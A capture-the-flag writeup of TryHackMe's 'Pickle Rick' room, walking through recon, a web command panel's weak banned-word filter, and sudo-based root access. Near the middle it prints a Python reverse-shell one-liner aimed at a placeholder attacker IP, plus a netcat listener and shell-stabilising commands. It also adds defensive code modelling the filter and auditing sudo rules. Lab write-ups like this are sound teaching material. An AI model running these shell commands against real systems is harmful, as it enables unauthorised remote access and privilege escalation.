Pickle Rick - A Rick and Morty CTF Writeup.
"Come on, flip the pickle, Morty. You're not gonna regret it. The payoff is huge."
Aside from being one of the greatest episodes of Rick and Morty, Pickle Rick is also one of the starter Capture the Flags (CTFs) provided by the awesome TryHackMe (https://tryhackme.com), and in this article I'll try to thoroughly break down the steps I took to complete it.
There are already plenty of writeups of this CTF, each of them slightly different and hopefully this provides another knowledge resource to run through the exercise.
The setup and goal is quite simple.
"This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle."
Architecturally, there isn't much to describe - there is a server hosting a website which has a message from 'Rick' asking Morty for help finding 3 secret ingredients to turn him from a Pickle back to Rick by logging onto his computer - except the stumbling block is that he's forgotten his password. Cue, you.
NOTE - I'M USING THE TRYHACKME ATTACKBOX IN THIS WRITEUP. STABILISING THE REVERSE SHELL LATER ON MAY NOT WORK FROM KALI AS IT USES ZSH. Google it.
When you provision the machine, it provides you with a URL to the webpage which when clicking, takes you to something looking like this
From this starting point you've got a few options. You already know the IP so you could go off and immediately kick off some nmap scans; however, I opted for some simple passive recon to start with and checked the page source.
Checking down the page you get presented with your first lead.
<!-- Note to self, remember username! Username: R1ckRul3s -->
Noting this down, we move on.
At this point, for the sake of ease, I set a local variable for the website to something shorthand, in my case TGT, which I then echo to make sure it's set.
TGT=http://<IP>
echo $TGT
We can now start to perform some more active recon and get our hands dirty.
Note: In this CTF, you'll find that the provided link directs you to the HTTPS version of the website; in the variable, be sure to use the HTTP version. I tried using the HTTPS URL, specifying -k in gobuster to ignore insecure SSL as well as increasing --timeout to 20s, and it still errored.
Running gobuster against our variable with a few switches we can see some interesting results.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $TGT -x php,html,pdf,txt
This is what we get returned.
/login.php (Status: 200)
/index.html (Status: 200)
/assets (Status: 301)
/portal.php (Status: 302)
/robots.txt (Status: 200)
/denied.php (Status: 302)
/server-status (Status: 403)
/clue.txt (Status: 200)
===============================================================
2022/02/14 19:01:15 Finished
===============================================================
A couple of interesting things to see here. Let's check out robots.txt, as this may give off intel on what is or isn't allowed to be indexed by search engines etc. This is what we find.
Wubbalubbadubdub
Not exactly clear what this is, but note it down nonetheless. We also see a login.php page which immediately draws attention. Let's check it out.
No surprises, it takes us to a login page asking for a username and password. Remember those things we took note of?
One was definitely a username, as stated in the page source; the other, perhaps a password?
Let's try them out.
We're in! And presented with another puzzle to solve.
Clicking around the links doesn't lead anywhere obvious other than some access denied pages however we do have this ominous "Command Panel".
Try smashing some typical things in here like 'ls', 'cat', 'cd' etc. and you'll find that some work and some don't. Annoyingly, the more interesting ones we want, such as 'cat', don't work. This is especially irritating given that on an 'ls' we see something we really want: what appears to be a super secret pickle ingredient.
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
No sweat, although cat is apparently on the banned list, we can use a number of other options. I personally used 'strings <filename>' on this step, but there are other methods such as using 'grep . <filename>' or even recursively checking everything using 'grep . -R'.
Fun fact - by checking portal.php you can see the 'banned list' of commands in the array.
portal.php: // Cant use cat
portal.php: $cmds = array("cat", "head", "more", "tail", "nano", "vim", "vi");
portal.php: if(isset($_POST["command"])) {
portal.php: if(contains($_POST["command"], $cmds)) {
portal.php: echo "</br><p><u>Command disabled</u> to make it hard for future <b>PICKLEEEE RICCCKKKK</b>.</p><img src='assets/fail.gif'>";
portal.php: } else {
portal.php: $output = shell_exec($_POST["command"]);
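To make the weakness of that banned-list check concrete, here is an added Python model of it (not the CTF's own code, which is PHP) placed beside an allowlist design that never hands request text to a shell. It assumes portal.php's contains() helper, whose body is not shown above, is a plain substring test; the panel inputs used are constructed from this writeup.

```python
# Added example (not the CTF's own code): a Python model of the check quoted
# from portal.php, beside an allowlist design that never hands request text
# to a shell. Assumption: portal.php's contains() helper, whose body is not
# shown, is a plain substring test.
import subprocess
from typing import List, Optional

# The $cmds array from portal.php.
BANNED = ("cat", "head", "more", "tail", "nano", "vim", "vi")

def blacklist_allows(command: str) -> bool:
    """Model of `if(contains($_POST["command"], $cmds))`: the request is
    refused only when a banned word occurs somewhere in the string, and
    anything else goes straight to shell_exec()."""
    return not any(word in command for word in BANNED)

# Hardened design: a fixed menu of argv lists keyed by the only values the
# form may submit. No shell, no user-controlled arguments.
ALLOWED = {
    "list": ["ls", "-la"],
    "whoami": ["whoami"],
    "uptime": ["uptime"],
}

def resolve_allowlisted(choice: str) -> Optional[List[str]]:
    """Return the argv for a menu choice, or None to refuse it."""
    return list(ALLOWED[choice]) if choice in ALLOWED else None

def run_allowlisted(choice: str) -> str:
    argv = resolve_allowlisted(choice)
    if argv is None:
        return "Command disabled"
    # shell=False: argv reaches execve() directly, so no operators,
    # substitutions or extra binaries can ride along.
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout

if __name__ == "__main__":
    # Constructed sample inputs from the writeup's command panel.
    for cmd in ("cat clue.txt", "strings clue.txt", "grep . -R", "locate clue.txt"):
        verdict = "runs" if blacklist_allows(cmd) else "refused"
        print(f"blacklist  {cmd!r:20} -> {verdict}")
    for choice in ("list", "strings clue.txt"):
        verdict = "runs" if resolve_allowlisted(choice) else "refused"
        print(f"allowlist  {choice!r:20} -> {verdict}")
```

Note that the substring check cuts both ways: 'strings' and 'grep' sail through, while a harmless 'locate' is refused because it contains 'cat'.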
Back to the goal in mind, obviously we find the first ingredient, which I won't put here, to be super irritating to anyone looking to this for an easy win, in the file
Sup3rS3cretPickl3Ingred.txt
and the clue.txt stating:
Look around the file system for the other ingredient.
points us to where the next ones might be found. But how do we get to the filesystem to check for these? How can we get a shell on the server itself? We know we have remote code execution through this command panel, and we know what we can't use, so let's hop to some Google research and find something that may give us results.
Pentestmonkey is a great resource for basic reverse shells amongst other things (https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) and we can see if any of these are of any use, but first let's figure out what we can run. Python is a natural starting point given its wide acceptance and usage in today's world.
python -c "print('pickle')"
This yields no results but using python3 does indeed return something. Looks like we have python3 to work with.
python3 -c "print('pickle')"
Let's go back to pentestmonkey and look for some basic python reverse shells and as we can see there is one that we can try.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
First, we need to set a netcat listener up on our attackbox for connections coming in on 9001. Feel free to use whatever high port here.
nc -lvnp 9001
Then let's modify the python script to our own details (replacing x.x.x.x with your own instance IP). Remember we are working with python3, so add that in at the start.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Hopefully you'll see the Command Panel hang and go nowhere, while on our attackbox we get:
root@ip-x-x-x-x:~# nc -lvnp 9001
Listening on [0.0.0.0] (family 0, port 9001)
Connection from 10.10.126.89 53148 received!
/bin/sh: 0: can't access tty; job control turned off
$
We have shell! Granted it's a horrid, unstable, dumb shell which makes you want to throw a hissy fit when you accidentally close your netcat session with 'CTRL+C' or can't auto-complete with tab, but we can fix that shortly. Let's do some quick system enumeration and internal recon.
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ groups
www-data
$ sudo -l
Matching Defaults entries for www-data on
    ip-x-x-x-x.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on
        ip-x-x-x-x.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
$ ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
$
Hang on. Hang on. (ALL) NOPASSWD: ALL. That's what we like to see (and why this is flagged as an easy CTF). www-data can run any command as any user via sudo without being asked for a password, so we can simply do this.
$ sudo su
whoami
root
Well, we've rooted the box at least. But that isn't the goal of this CTF; it's to find the ingredients.
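To turn that sudo -l reading into a repeatable check, here is an added auditor (not from the writeup) that parses output in the layout shown above and grades each grant; the sample text is constructed from the output above plus one hypothetical apt-get rule for contrast.

```python
# Added example, not part of the writeup: a small auditor for `sudo -l` output
# in the layout shown above. SAMPLE is constructed from the writeup's output
# plus one hypothetical scoped rule for contrast.
import re
from typing import List, Tuple

# One rule line: "(runas) TAG: TAG: commands"; tags such as NOPASSWD are optional.
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")

SAMPLE = """\
Matching Defaults entries for www-data on
    ip-x-x-x-x.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User www-data may run the following commands on
        ip-x-x-x-x.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
    (root) /usr/bin/apt-get update
"""

def parse_sudo_l(text: str) -> List[Tuple[str, List[str], str]]:
    """Return (runas, tags, commands) for each rule after the 'may run' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True       # the Defaults block above is not a grant
            continue
        m = RULE.match(line) if in_rules else None
        if m:
            tags = [t.strip() for t in m["tags"].split(":") if t.strip()]
            rules.append((m["runas"], tags, m["cmds"]))
    return rules

def grade(rule: Tuple[str, List[str], str]) -> str:
    """Severity of one grant from a privilege-audit point of view."""
    _runas, tags, cmds = rule
    if cmds == "ALL" and "NOPASSWD" in tags:
        return "critical"   # root for the asking, exactly the case on this box
    if cmds == "ALL":
        return "high"       # anything as root, but the caller's password is needed
    if "NOPASSWD" in tags:
        return "review"     # scoped, but the binary may still offer a shell escape
    return "info"

def audit(text: str) -> List[Tuple[str, str]]:
    return [(cmds, grade((runas, tags, cmds))) for runas, tags, cmds in parse_sudo_l(text)]
```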
Let's sort this shell out, as I'm sure by now you've had enough of it.
Again, this is a Google job. There are so many resources out there, but the basis of many of them is to do the following:
python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo
At this stage you can carry on, or you may want to set the terminal type to xterm using the following.
export TERM=xterm
Now we should have a more stable shell and a much easier time getting around.
Checking around, the first port of call is to look at what users have in their home directories. That leads us to the third ingredient under /root/, since we naturally end up as root after our privesc, if you want to call it that. Cat it out and enter it in. One more to go.
root@ip-x-x-x-x:/home/rick# cd /root
root@ip-x-x-x-x:~# ls
3rd.txt  snap
Checking the other users, we also find the user 'rick' has the second ingredient. As before, cat it out and there you go!
root@ip-x-x-x-x:/# cd home/rick
root@ip-x-x-x-x:/home/rick# ls
second ingredients
CTF Complete!
This is a very beginner friendly CTF and covers some basics such as active/passive recon, command injection/remote execution and a few other cool elements.
I may make a YouTube video covering this one live, as many I've seen, with the exception of our lord and saviour, John Hammond, just blast through the commands without explaining the methodology or reasons behind running them.
Hope you like it and keep CTFing!